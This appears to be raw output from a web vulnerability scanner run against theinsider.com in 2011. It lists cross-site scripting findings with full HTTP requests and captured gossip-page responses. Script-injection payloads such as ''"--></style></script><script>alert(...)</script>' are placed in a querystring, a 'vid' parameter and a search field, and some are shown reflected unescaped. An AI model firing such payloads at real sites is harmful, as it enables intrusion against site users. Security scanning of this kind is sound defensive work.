class="ad_center">
<!-- begin ad tag (tile=1) -->
<div class="dart_ad">
<script language="JavaScript" type="text/javascript">
//<![CDATA[
ord=Math.random()*10000000000000000;
document.write('<script type="text/javascript" src="http://ad.doubleclick.net/adj/theinsider.com/gossip_article;tile=1;sz=960x50,728x90;ord=' + ord + '?"><\/script>');

//]]>
</script>
<noscript>
<a href="http://ad.doubleclick.net/jump/theinsider.com/gossip_article;tile=1;sz=960x50,728x90;ord=123456789?" target="_blank" ><img src="http://ad.doubleclick.net/ad/theinsider.com/gossip_article;tile=1;sz=960x50,960x50;ord=123456789?" border="0" alt="" /></a>
</noscript>
</div>
<!-- end ad tag -->
</div></div> <!-- END TOP LEADERBOARD AD --> <div id="container"> <!-- HEADER --> <div id="header"> <!-- LOGO --> <div id="logo"><a href="http://www.theinsider.com/" title="The Insider.com"><span>The Insider.com</span></a></div> <!-- END LOGO --> <div id="search_join_nav"> <!-- SEARCH BOX --> <div id="search"> <div id="search_wrapper"> <form action="/search/index.html?sort=date-sdate" id="cse-search-box" method="POST"> <div> <input type="text" class="searchbox" name="q" value="SEARCH THE INSIDER.COM" onclick="javascript:if(this.value == 'SEARCH THE INSIDER.COM'){this.value = '';}"> <input type="image" src="http://www.theinsider.com/media/img/search_mag.jpg" class="searchbox_submit" value="" name="sa"> <input type="hidden" name="hq" value="more:recent4" /> </div> </form> <script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script> </div> <div id="top_searches"> <p>TOP SEARCHES: </p><script language="javascript"> function searchPost(term) { document.forms["cse-search-box"].elements[0].value = term; document.forms["cse-search-box"].submit(); return true; }</script> <div class='searchterms'></div> </div> </div> <!-- END SEARCH BOX --> <!-- SOCIAL JOIN BUTTONS --> <div class="large_social_btns"> <iframe src="http://www.facebook.com/plugins/like.php?href=http://www.facebook.com/theinsider&amp;send=false&amp;layout=button_count&amp;width=110&amp;show_faces=false&amp;action=like&amp;colorscheme=light&amp;font&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:110px; height:21px;" allowTransparency="true" class="social_join fb"></iframe> <a href="http://www.twitter.com/theinsider" target="_blank" title="Follow Us on Twitter"><img src="/media/img/tw_joinus.jpg" alt="Follow Us on Twitter" class="social_join tw" /></a> <div style="position:absolute"><img class="ins_fb_text" alt="The Insider on Facebook" src="/media/img/ins_on_fb.jpg"></div> </div> <!-- END SOCIAL JOIN BUTTONS --> <div class="clearfix"></div> <!-- NAVIGATION -->
<div id="navbar">
<ul>
<li> <a href="/fashion"><img src="/media/img/fashion.png" alt="[ FASHION ]" /> <span class="fashion"></span> </a> </li>
<li> <a href="/lol"><img src="/media/img/lol.png" alt="[ LOL ]" /> <span class="humor"></span> </a> </li>
<li> <a href="/screen"><img src="/media/img/screen.png" alt="[ SCREEN ]" /> <span class="filmtv"></span> </a> </li>
<li> <a href="/gossip"><img src="/media/img/gossip.png" alt="[ GOSSIP ]" /> <span class="gossip"></span> </a> </li>
<li> <a href="/thelook"><img src="/media/img/thelook.png" alt="[ THE LOOK ]" /> <span class="beauty"></span> </a> </li>
<li> <a href="/tunes"><img src="/media/img/tunes.png" alt="[ TUNES ]" /> <span class="tunes"></span> </a> </li>
</ul>
</div>
<!-- END NAVIGATION --> <h1>The Insider.com</h1> </div> </div> <div class="clearfix"></div> <!-- END HEADER --> <!-- MAIN CONTENT --> <!-- BELOW: article.mc --><!– Acudeo companion banner loader script –> <script type="text/javascript" src="http://objects.tremormedia.com/embed/js/banners.js"></script> <script type="text/javascript"> function displayCompanionBanners(banners) { tmDisplayBanner(banners, "adCompanionBanner", 300, 250); } </script> <!– Acudeo companion banner loader script –> <link rel='stylesheet' href='/inc/gossip/gossip.css' type='text/css' /><!--[if IE 7]><style>.contrib_date1 { font-size: 12px !important; font-weight: bold; margin: -10px 0 0 5px; font-family: 'AvalonBook',Futura,"Futura BT","Century Gothic",Tahoma,Helvetica,"Helvetica Neue",Arial,sans-serif;}.lovethis_storylist ul {list-style-type: none; margin-bottom: 10px; margin-top: 0; padding: 0; width: 140px; position: relative; left: -40px;}.lovethis_storylist ul {margin-left: 30px;}.contrib_date { font-size: 12px; font-weight: bold; margin: 0 0 0 68px;}</style><![endif]--><style>.contrib_date1 { font-size: 11px !important; font-weight: normal !important; margin: 12px 0 0 5px !important; font-family: Tahoma, Helvetica, Arial, sans-serif;}.article-more-news-box img{float: left; margin-right: 15px;}#adCompanionBanner {background-color: white; text-align: left; margin: 10px 10px 10px 0;}.article-more-news-box {height: 100%; margin-bottom: 20px;}.contributor_bug {display: inline; height: 15px; padding: 0 0 0 10px; vertical-align: bottom; width: 71px;}.contrib_border { border-right: 1px solid #BBBBBB; float: left; font-size: 12px; font-weight: bold; line-height: 1; margin: -10px 0; font-family: Tahoma, Helvetica, Arial, sans-serif; padding-bottom:4px;} .contrib_border a:link, .contrib_border a:hover, .contrib_border a:visited, .contrib_border a:active {font-weight:bold;}.contrib_date {font-size: 12px; font-weight: bold; margin: -0px 0 0 68px;}.contrib_by { display: inline; float: left; font-size: 10px; height: 8px; margin: -7px 0 9px 0; width: 200px;}.contrib_container {height: 40px; border-bottom: 1px solid #000; float:left; width: 300px; padding-bottom:8px;}.contrib_cont {width: 300px; display: inline; height: 63px; float:left; margin: 0px 10px 10px 0px;}</style><!-- Main Content --><div id="main_content"><!-- LEFT COLUMN --><div id="left_col"><!-- CHANNEL TITLE --><div id="channel_title_bar"><a href='/gossip'><img src='/media/img/channel_page_name_gossip.png' class='channel_title_logo' alt='' /></a></div><!-- END CHANNEL TITLE --><!-- STORY CONTAINER --><div class="content_container"><div class="channel_story_img"><img src='/media/photo/2011/08/81909/miranda_cosgrove_340_110811.jpg' alt='' /><p class='photo_copyright'></p></div><p class='article'><h3>Cosgrove Injured in Bus Crash</h3><p class='publish_date'></p><p class='publish_date'>August 11, 2011</p><p>
Both <a href="http://www.theinsider.com/tv/41906_VIDEO_Michelle_Obama_Guest_Stars_On_iCarly/index.html" target="_blank">Miranda Cosgrove </a>and her mother reportedly suffered injuries in a &quot;life-threatening crash&quot; on Thursday morning.






</p><p>
A source told <a href="http://www.people.com/people/" target="_blank">People.com </a>that Miranda's tour bus collided with a tractor-trailer leaving the <em><a href="http://cs1.theinsider.com/screen/41416_Michelle_Obama_to_Guest_Star_on_iCarly/index.html" target="_blank">iCarly</a></em> star with a broken ankle and her mom &quot;really beaten up.&quot;






</p><p>
The bus driver may have been the most affected by the accident as he remains in critical condition.






</p><p>
&quot;A piece from the tractor-trailer went straight through the windshield and the driver's arm was sliced all the way through,&quot; the source said.






</p><p>
None of the other passengers were seriously injured, but Cosgrove has allegedly had to postpone her tour until the fall.























</p><!-- <a href='' target='_blank'><img src='' alt='' class='contributor_bug' /></a> --></p> <!-- SOCIAL SHARE BTNS --> <div id="end_article_social_btns"> <div id="fb-root"></div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script><fb:like href="http://www.theinsider.com/gossip/43339_Miranda_Cosgrove_Escapes_Life_Threatening_Crash/index.html" send="true" width="90" show_faces="false" layout="button_count" font="arial"></fb:like> <!-- TWEET BTN --> <a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script> </div> <!-- END SOCIAL SHARE BTNS --> <div class="clearfix"></div> <!-- FB COMMENTING --> <div id="comments"> <h5 class="section_headings comments_heading">WHAT ARE YOUR THOUGHTS?</h5> <fb:comments href='http://www.theinsider.com/gossip/43339_Miranda_Cosgrove_Escapes_Life_Threatening_Crash/index.html' num_posts='4' width='660'></fb:comments> </div> <div class="clearfix"></div> <!-- END FB COMMENTING --> <div id="outbrain_suggestions_wide"><img src="/media/img/outbrainheader.gif" alt="" /><script type="text/JavaScript">var OB_permalink= 'http://www.theinsider.com';var OB_Template="insider";var OB_widgetId= 'AR_1';var OB_langJS ='http://widgets.outbrain.com/lang_en.js';if ( typeof(OB_Script)!='undefined' )OutbrainStart();else{var OB_Script = true;var str = "<script src='http://widgets.outbrain.com/outbrainWidget.js'; type='text/javascript'></"+"script>";document.write(str);}</script></div> <div class="clearfix"></div></div> <div class="article-more-news"> <h3>MORE NEWS</h3><div class="article-more-news-box"><a href="/tunes/45573_MUTEMATH_Performs_Spotlight/index.html"><img src="/media/photo/2011/10/93494/mute_112.jpg" alt="" class="article-more-news-150thumb" /></a><div class="ins_story_float"><h5><a href="/tunes/45573_MUTEMATH_Performs_Spotlight/index.html" class="article-more-news-headline">Now You Know: MUTEMATH</a></h5><div class="article-more-news-text"><p>In the latest example of my music industry influence, and totally humble mindset, VH1 has selected MUTEMATH (a band I declared <a href="http://www.theinsider.com/tunes/43255_MUTEMATH_Blood_Pressure_Song_Premiere/index.html" target="_blank">you &quot;must-kno... <a href="/tunes/45573_MUTEMATH_Performs_Spotlight/index.html" class="article-readmore">more</a></p></a></p><p class="article-more-news-published-info">Published </p><div style="clear:both;"></div></div></div></div><div class="article-more-news-box"><a href="/movies/45571_Haley_Atwell_Talks_Captain_America/index.html"><img src="/media/photo/2011/10/93412/halery_112_paramount.jpg" alt="" class="article-more-news-150thumb" /></a><div class="ins_story_float"><h5><a ..
- /gossip/43330_Watch_Snooki_Gets_Serious_with_New_Boyfriend/

/gossip/43330_Watch_Snooki_Gets_Serious_with_New_Boyfriend/

http://www.theinsider.com/gossip/43330_Watch_Snooki_Gets_Serious_with_New_Boyfriend/?'%22--%3E%3C/st..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x002687)</script>

Request

GET /gossip/43330_Watch_Snooki_Gets_Serious_with_New_Boyfriend/?'"--> HTTP/1.1
Referer: http://www.theinsider.com/gossip/43330_Watch_Snooki_Gets_Serious_with_New_Boyfriend/index.html
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: www.theinsider.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Content-Encoding:
Cache-Control: max-age=300
Date: Tue, 06 Dec 2011 07:09:19 GMT
Content-Length: 13349
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><!-- <base id="htmldom" href="http://www.theinsider.com/" /> --> <!-- This breaks links while in preview server --><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>Watch: Snooki Gets Serious with New Boyfriend</title><meta name="description" content="" /><meta name="keywords" content="Jersey Shore, jionni lavalle, news, snooki, snooki boyfriend" /><meta name="category" content="gossip" /><meta name="date" content="2011-08-11 10:16:00" /><meta property="og:title" content="Watch: Snooki Gets Serious with New Boyfriend" /><meta property="og:type" content="article" /><meta property="og:url" content="http://www.theinsider.com/gossip/43330_Watch_Snooki_Gets_Serious_with_New_Boyfriend/index.html" /><meta property="og:image" content="http://www.theinsider.com/media/photo/2011/08/81844/vid_snooki_bf_110811_150.jpg" /><meta property="og:site_name" content="www.theinsider.com" /><meta property="og:description" content="Cameras caught up with Jersey Shore star Snooki leaving MTV Studios in New York yesterday, where the pint-sized guidette was filmed holding hands with boyfriend Jionni LaValle." /><meta property="fb:app_id" content="123263397703043"/><PageMap> <DataObject type="date"> <Attribute name="displaydate" value="2011-08-11 10:16:00" /> <Attribute name="sdate" value="20110811" /> </DataObject> <DataObject type="thumbnail"> <Attribute name="src" value="http://www.theinsider.com/media/photo/2011/08/81844/vid_snooki_bf_110811_150.jpg" /> <Attribute name="width" value="150" /> <Attribute name="height" value="150" /> </DataObject></PageMap><script src="/js/jquery-1.4.2.min.js" type="text/javascript"></script><script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script><script type="text/javascript" src="/swfobject.js"></script><script src="/new_insider/jcapslide.js" type="text/javascript"></script><link rel="stylesheet" href="/inc/css/insider_phase_2.css" type="text/css" /><script src="/js/jquery-1.4.2.min.js" type="text/javascript"></script><script src="Scripts/swfobject_modified.js" type="text/javascript"></script><style>.ins_fb_text { display: block; left: 2px; position: absolute; top: 42px;}.ad_center { margin: 0 auto; width: 728px;}</style><!--[if IE]> <style type="text/css"> #navbar li {line-height: 100% !important;} #navbar li span {margin-top:0px !important;} </style><![endif]--></head><body class="body"><!--start Meebo A--><script type="text/javascript">window.Meebo||function(c){function p(){return["<",i,' onload="var d=',g,";d.getElementsByTagName('head')[0].",j,"(d.",h,"('script')).",k,"='//cim.meebo.com/cim?iv=",a.v,"&",q,"=",c[q],c[l]?"&"+l+"="+c[l]:"",c[e]?"&"+e+"="+c[e]:"","'\"></",i,">"].join("")}var f=window,a=f.Meebo=f.Meebo||function(){(a._=a._||[]).push(arguments)},d=document,i="body",m=d[i],r;if(!m){r=arguments.callee;return setTimeout(function(){r(c)},100)}a.$={0:+new Date};a.T=function(u){a.$[u]=new Date-a.$[0]};a.v=5;var j="appendChild",h="createElement",k="src",l="lang",q="network",e="domain",n=d[h]("div"),v=n[j](d[h]("m")),b=d[h]("iframe"),g="document",o,s=function(){a.T("load");a("load")};f.addEventListener?f.addEventListener("load",s,false):f.attachEvent("onload",s);n.style.display="none";m.insertBefore(n,m.firstChild).id="meebo";b.frameBorder="0";b.name=b.id="meebo-iframe";b.allowTransparency="true";v[j](b);try{b.contentWindow[g].open()}catch(w){c[e]=d[e];o="javascript:var d="+g+".open();d.domain='"+d.domain+"';";b[k]=o+"void(0);"}try{var t=b.contentWindow[g];t.write(p());t.close()}catch(x){b[k]=o+'d.write("'+p().replace(/"/g,'\\"')+'");d.close();'}a.T(1)}({network:"theinsider"});</script><!--end Meebo A--> <!-- TOP LEADERBOARD AD --><div id="leaderboard-top-box"><div class="ad_center">
<!-- begin ad tag (tile=1) -->
<div class="dart_ad">
<script language="JavaScript" type="text/javascript">
//<![CDATA[
ord=Math.random()*10000000000000000;
document.write('<script type="text/javascript" src="http://ad.doubleclick.net/adj/theinsider.com/gossip_video;tile=1;sz=960x50,728x90;ord=' + ord + '?"><\/script>');

//]]>
</script>
<noscript>
<a href="http://ad.doubleclick.net/jump/theinsider.com/gossip_video;tile=1;sz=960x50,728x90;ord=123456789?" target="_blank" ><img src="http://ad.doubleclick.net/ad/theinsider.com/gossip_video;tile=1;sz=960x50,960x50;ord=123456789?" border="0" alt="" /></a>
</noscript>
</div>
<!-- end ad tag -->
</div></div> <!-- END TOP LEADERBOARD AD --> <div id="container"> <!-- HEADER --> <div id="header"> <!-- LOGO --> <div id="logo"><a href="http://www.theinsider.com/" title="The Insider.com"><span>The Insider.com</span></a></div> <!-- END LOGO --> <div id="search_join_nav"> <!-- SEARCH BOX --> <div id="search"> <div id="search_wrapper"> <form action="/search/index.html?sort=date-sdate" id="cse-search-box" method="POST"> <div> <input type="text" class="searchbox" name="q" value="SEARCH THE INSIDER.COM" onclick="javascript:if(this.value == 'SEARCH THE INSIDER.COM'){this.value = '';}"> <input type="image" src="http://www.theinsider.com/media/img/search_mag.jpg" class="searchbox_submit" value="" name="sa"> <input type="hidden" name="hq" value="more:recent4" /> </div> </form> <script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script> </div> <div id="top_searches"> <p>TOP SEARCHES: </p><script language="javascript"> function searchPost(term) { document.forms["cse-search-box"].elements[0].value = term; document.forms["cse-search-box"].submit(); return true; }</script> <div class='searchterms'></div> </div> </div> <!-- END SEARCH BOX --> <!-- SOCIAL JOIN BUTTONS --> <div class="large_social_btns"> <iframe src="http://www.facebook.com/plugins/like.php?href=http://www.facebook.com/theinsider&amp;send=false&amp;layout=button_count&amp;width=110&amp;show_faces=false&amp;action=like&amp;colorscheme=light&amp;font&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:110px; height:21px;" allowTransparency="true" class="social_join fb"></iframe> <a href="http://www.twitter.com/theinsider" target="_blank" title="Follow Us on Twitter"><img src="/media/img/tw_joinus.jpg" alt="Follow Us on Twitter" class="social_join tw" /></a> <div style="position:absolute"><img class="ins_fb_text" alt="The Insider on Facebook" src="/media/img/ins_on_fb.jpg"></div> </div> <!-- END SOCIAL JOIN BUTTONS --> <div class="clearfix"></div> <!-- NAVIGATION -->
<div id="navbar">
<ul>
<li> <a href="/fashion"><img src="/media/img/fashion.png" alt="[ FASHION ]" /> <span class="fashion"></span> </a> </li>
<li> <a href="/lol"><img src="/media/img/lol.png" alt="[ LOL ]" /> <span class="humor"></span> </a> </li>
<li> <a href="/screen"><img src="/media/img/screen.png" alt="[ SCREEN ]" /> <span class="filmtv"></span> </a> </li>
<li> <a href="/gossip"><img src="/media/img/gossip.png" alt="[ GOSSIP ]" /> <span class="gossip"></span> </a> </li>
<li> <a href="/thelook"><img src="/media/img/thelook.png" alt="[ THE LOOK ]" /> <span class="beauty"></span> </a> </li>
<li> <a href="/tunes"><img src="/media/img/tunes.png" alt="[ TUNES ]" /> <span class="tunes"></span> </a> </li>
</ul>
</div>
<!-- END NAVIGATION --> <h1>The Insider.com</h1> </div> </div> <div class="clearfix"></div> <!-- END HEADER --> <!-- MAIN CONTENT --> <!-- BELOW: article.mc --><!– Acudeo companion banner loader script –> <script type="text/javascript" src="http://objects.tremormedia.com/embed/js/banners.js"></script> <script type="text/javascript"> function displayCompanionBanners(banners) { tmDisplayBanner(banners, "adCompanionBanner", 300, 250); } </script> <!– Acudeo companion banner loader script –> <link rel='stylesheet' href='/inc/gossip/gossip.css' type='text/css' /><!--[if IE 7]><style>.contrib_date1 { font-size: 12px !important; font-weight: bold; margin: -10px 0 0 5px; font-family: 'AvalonBook',Futura,"Futura BT","Century Gothic",Tahoma,Helvetica,"Helvetica Neue",Arial,sans-serif;}.lovethis_storylist ul {list-style-type: none; margin-bottom: 10px; margin-top: 0; padding: 0; width: 140px; position: relative; left: -40px;}.lovethis_storylist ul {margin-left: 30px;}.contrib_date { font-size: 12px; font-weight: bold; margin: 0 0 0 68px;}</style><![endif]--><style>.contrib_date1 { font-size: 11px !important; font-weight: normal !important; margin: 12px 0 0 5px !important; font-family: Tahoma, Helvetica, Arial, sans-serif;}.article-more-news-box img{float: left; margin-right: 15px;}#adCompanionBanner {background-color: white; text-align: left; margin: 10px 10px 10px 0;}.article-more-news-box {height: 100%; margin-bottom: 20px;}.contributor_bug {display: inline; height: 15px; padding: 0 0 0 10px; vertical-align: bottom; width: 71px;}.contrib_border { border-right: 1px solid #BBBBBB; float: left; font-size: 12px; font-weight: bold; line-height: 1; margin: -10px 0; font-family: Tahoma, Helvetica, Arial, sans-serif; padding-bottom:4px;} .contrib_border a:link, .contrib_border a:hover, .contrib_border a:visited, .contrib_border a:active {font-weight:bold;}.contrib_date {font-size: 12px; font-weight: bold; margin: -0px 0 0 68px;}.contrib_by { display: inline; float: left; font-size: 10px; height: 8px; margin: -7px 0 9px 0; width: 200px;}.contrib_container {height: 40px; border-bottom: 1px solid #000; float:left; width: 300px; padding-bottom:8px;}.contrib_cont {width: 300px; display: inline; height: 63px; float:left; margin: 0px 10px 10px 0px;}</style><!-- Main Content --><div id="main_content"><!-- LEFT COLUMN --><div id="left_col"><!-- CHANNEL TITLE --><div id="channel_title_bar"><a href='/gossip'><img src='/media/img/channel_page_name_gossip.png' class='channel_title_logo' alt='' /></a></div><!-- END CHANNEL TITLE --><!-- STORY CONTAINER --><div class="content_container"><div class="channel_story_img"> <div id='slate_player' class='show_slate' style='z-index: 2;'><object id='flashobject' type='application/x-shockwave-flash' allowScriptAccess='always' allowFullScreen='true' allowNetworking='all' height='272' width='431' data ='http://www.theinsider.com/media/flash/unicorn/UMInterface_Tremor.swf'><param name='quality' value='high' /><param name='allowFullScreen' value='true' /><param name='allowScriptAccess' value='always' /><param name='allowNetworking' value='all' /><param name='movie' value='http://www.theinsider.com/media/flash/unicorn/UMInterface_Tremor.swf'/><param name='flashvars' value='config=http://r.unicornmedia.com/embed/ab2b5d77-6ea3-4720-8249-dccf2b6bac03?view=fkey%26view_id=43326&programID=4dd16b9508b2e' /></object></div><div id='adCompanionBanner'></div> </div><p class='article'><h3>Wedding Bells for Snooki and BF? [video]</h3><p class='publish_date'></p><p class='publish_date'>August 11, 2011</p><p>
Cameras caught up with <em>Jersey Shore</em> star Snooki leaving MTV Studios in New York yesterday, where the <a href="http://oaktree.theinsider.com/screen/43310_Snooki_I_Would_Win_the_Whole_Thing_on_Dancing_with_the_Stars/index.html" target="_blank">pint-sized guidette</a> was filmed holding hands with boyfriend Jionni LaValle.</p><p>
Arguably the <a href="http://cs1.theinsider.com/screen/43084_Snooki_Leaves_Jersey_Shore_Wearing_a_Bunny_Head_video/index.html" target="_blank">breakout star</a> of MTV's <a href="http://www.theinsider.com/news/40583_WATCH_Snooki_and_the_Jersey_Shore_girls_head_for_Italy/index.html" target="_blank">hit show</a>, the 23-year-old revealed just how serious she was about Jionni when she told <em>Good Morning America</em> on Wednesday, &quot;Jionni's a great guy, so you know I'm down to make Guido babies with him!&quot;</p><p>
Though she clarified that she was not ready to get married yet, she certainly didn't have any reservations when it came to putting the pressure on her beau, telling him, &quot;I want a big ring baby!&quot;</p><p>
Check out the video to see the lovebirds in NYC.













</p><!-- <a href='' target='_blank'><img src='' alt='' class='contributor_bug' /></a> --></p> <!-- SOCIAL SHARE BTNS --> <div id="end_article_social_btns"> <div id="fb-root"></div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script><fb:like href="http://www.theinsider.com/gossip/43330_Watch_Snooki_Gets_Serious_with_New_Boyfriend/index.html" send="true" width="90" show_faces="false" layout="button_count" font="arial"></fb:like> <!-- TWEET BTN --> <a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script> </div> <!-- END SOCIAL SHARE BTNS --> <div class="clearfix"></div> <!-- FB COMMENTING --> <div id="comments"> <h5 class="section_headings comments_heading">WHAT ARE YOUR THOUGHTS?</h5> <fb:comments href='http://www.theinsider.com/gossip/43330_Watch_Snooki_Gets_Serious_with_New_Boyfriend/index.html' num_posts='4' width='660'></fb:comments> </div> <div class="clearfix"></div> <!-- END FB COMMENTING --> <div id="outbrain_suggestions_wide"><img src="/media/img/outbrainheader.gif" alt="" /><script type="text/JavaScript">var OB_permalink= 'http://www.theinsider.com';var OB_Template="insider";var OB_widgetId= 'AR_1';var OB_langJS ='http://widgets.outbrain.com/lang_en.js';if ( typeof(OB_Script)!='undefined' )OutbrainStart();else{var OB_Script = true;var str = "<script src='http://widgets.outbrain.com/outbrainWidget.js'; type='text/javascript'></"+"script>";document.write(str);}</script></div> <div class="clearfix"></div></div> <div class="article-more-news"> <h3>MORE NEWS</h3><div class="article-more-news-box"><a href="/tunes/45573_MUTEMATH_Performs_Spotlight/index.html"><img src="/media/photo/2011/10/93494/mute_112.jpg" alt="" class="article-more-news-150thumb" /></a><div class="ins_story_float"><h5><a href="/tunes/45573_MUTEMATH_Performs_Spotlight/index.html" class="article-more-news-headline">Now You Know: MUTEMATH</a></h5><div class="article-more-news-text"><p>In the latest example of my music industry influence, and totally humble mindset, VH1 has selected MUTEMATH (a band I declared <a href="http://www.theinsider.com/tunes/43255_MUTEMATH_Blood_Pressure_Song_Premiere/index.html" target="_blank">you &quot;must-kno... <a href="/tunes/45573_MUTEMATH_Perfo..
- /media/flash/visitcalifornia/index.html

/media/flash/visitcalifornia/index.html

http://www.theinsider.com/media/flash/visitcalifornia/index.html?vid='%22--%3E%3C/style%3E%3C/script..

Parameters

Parameter Type Value
vid GET '"--></style></script><script>alert(0x002AB3)</script>

Request

GET /media/flash/visitcalifornia/index.html?vid='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x002AB3)%3C/script%3E HTTP/1.1
Referer: http://www.theinsider.com/visitcalifornia/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: www.theinsider.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Content-Encoding:
Cache-Control: max-age=300
Expires: Tue, 06 Dec 2011 07:15:01 GMT
Date: Tue, 06 Dec 2011 07:10:01 GMT
Content-Length: 1109
Connection: keep-alive


<html><head><title>ETonline.com Video Player</title><!-- FreeWheel MRM Javascript --> <script src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1" language="javascript" type="text/javascript"></script></head><body><div class="videomodal_top"></div><div class="videomodal_middle"> <div class="videomodal_vidplayer videopost"> <!-- <div id="'"--></style></script><script>netsparker(0x002AB3)</script>">ET Video</div> --> <object id="flashobject" type="application/x-shockwave-flash" allowScriptAccess="always" allowFullScreen="true" allowNetworking="all" height="272" width="431" data="http://r.unicornmedia.com/content.aspx?uid=AC26FE85-334B-4A21-B72C-154F743F5739&at=3dfac371-2d55-42c7-8bd0-a7e5ec424e88"> <param name="quality" value="high" /> <param name="allowFullScreen" value="true" /> <param name="allowScriptAccess" value="always" /> <param name="allowNetworking" value="all" /><param name="movie" value="http://r.unicornmedia.com/content.aspx?uid=AC26FE85-334B-4A21-B72C-154F743F5739&at=3dfac371-2d55-42c7-8bd0-a7e5ec424e88" /> <param name="flashvars" value="config=http://r.unicornmedia.com/embed/3dfac371-2d55-42c7-8bd0-a7e5ec424e88?view=fkey%26view_id='"--></style></script><script>netsparker(0x002AB3)</script>" /> </object> <div class="videomodal_title"></div> </div> <div class="videomodal_companion"> <span id="medium_rectangle" class="_fwph"> <form id="_fw_form_medium_rectangle" > <input type="hidden" name="_fw_input_medium_rectangle" id="_fw_input_medium_rectangle" value="w=300&h=250&envp=g_js&sflg=-nrpl;"> </form> <span id="_fw_container_medium_rectangle_companion" class="_fwac"> </span> <span id="_fw_container_medium_rectangle" class="_fwac"> <!-- LEAVE THIS AREA EMPTY --> </span> </span> </div><div class='clear'></div></div><div class="videomodal_bottom"></div><div style="display: none;"><script id="myscript" type="text/javascript" src="/includes/s_code.js"></script><script language="JavaScript" type="text/javascript">s.pageName=document.titles.server="www.etonline.com"s.referrer=document.referers.prop1="Video"s.pageURL="http://www.etonline.com/media/flash/visitcalifornia/index.html";var s_code=s.t();if(s_code)document.write(s_code)</script><script language="JavaScript" type="text/javascript"> if(navigator.appVersion.indexOf('MSIE')>=0)document.write(unescape('%3C')+'\!-'+'-') </script><noscript><img src="http://cbset.112.2O7.net/b/ss/cbset/1/H.1--NS/0" height="1" width="1" border="0" alt="" /></noscript></div></body></html>
- /search/index.html

/search/index.html

http://www.theinsider.com/search/index.html?sort=date-sdate

Parameters

Parameter Type Value
sort GET date-sdate
q POST '"--></style></script><script>alert(0x003010)</script>
sa POST 3
hq POST more:recent4

Request

POST /search/index.html?sort=date-sdate HTTP/1.1
Referer: http://www.theinsider.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.theinsider.com
Content-Length: 110
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

q='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x003010)%3c%2fscript%3e&sa=3&hq=more%3arecent4

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Content-Encoding:
Cache-Control: max-age=300
Date: Tue, 06 Dec 2011 07:11:26 GMT
Content-Length: 6631
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <!-- <base id="htmldom" href="http://www.theinsider.com/" /> --> <!-- This breaks links while in preview server --> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>Search Page - TheInsider.com</title> <meta name="description" content="" /> <meta name="keywords" content="" /> <meta name="category" content="search" /> <meta name="date" content="2011-05-25 12:00:00" /><meta property="og:title" content="Search Page" /><meta property="og:type" content="article" /><meta property="og:url" content="http://www.theinsider.com/search/index.html" /><meta property="og:image" content="http://www.theinsider.com/media/img/insider_logo_05172011.jpg" /><meta property="og:description" content="Search Page" /><meta property="og:site_name" content="www.theinsider.com" /><meta property="fb:app_id" content="123263397703043"/><PageMap><DataObject type="date"><Attribute name="displaydate" value="2011-05-25 12:00:00" /><Attribute name="sdate" value="20110525" /></DataObject><DataObject type="thumbnail"><Attribute name="src" value="http://www.theinsider.com/media/img/insider_logo_05172011.jpg" /><Attribute name="width" value="150" /><Attribute name="height" value="150" /></DataObject></PageMap> <link rel="stylesheet" href="/css/main/main.css" type="text/css" /> <link rel="stylesheet" href="/css/nivo-slider/nivo-slider.css" type="text/css" media="screen" /> <link rel="shortcut icon" href="http://www.theinsider.com/favicon.ico" /> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script> <script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script> <script 